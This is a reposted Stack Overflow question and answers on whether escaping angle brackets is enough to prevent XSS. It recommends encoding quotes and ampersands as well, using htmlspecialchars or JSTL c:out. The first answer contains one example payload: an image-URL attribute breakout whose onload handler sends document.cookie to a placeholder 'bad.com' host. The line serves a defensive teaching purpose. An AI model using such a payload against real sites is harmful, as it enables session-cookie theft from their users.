问题
I want to know if entiting the two marks < and > is enough to prevent XSS injections?
And if not, why? And what's the best solution?
回答1:
It depends very much on context.
Check out this example, from a typical forum site...
You may hotlink your avatar image. Enter the full URL.
Malicious user enters in input field
http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie)
There is no encoding there of less than and greater than, but still a big security hole.
With htmlspecialchars(), I found it a good idea to make (or use) a wrapper function of it that casts to a string, provides an easier way to disable double encoding (if necessary) and to ensure it is using the correct character set of your application. Kohana has a great example.
回答2:
You should also take doublequotes ", singlequotes ' and ampersands & into account. If you do that all during displaying/generating the output, then yes, it's enough.
You should only ensure that you do this for any user-controlled input, such as request parameters, request URL, request headers and user-controlled input which is been stored in a datastore.
In PHP you can do that with htmlspecialchars() and in JSP cou can do that with JSTL <c:out>.
来源:https://stackoverflow.com/questions/2113984/is-replacing-and-with-lt-and-gt-enough-to-prevent-xss-injection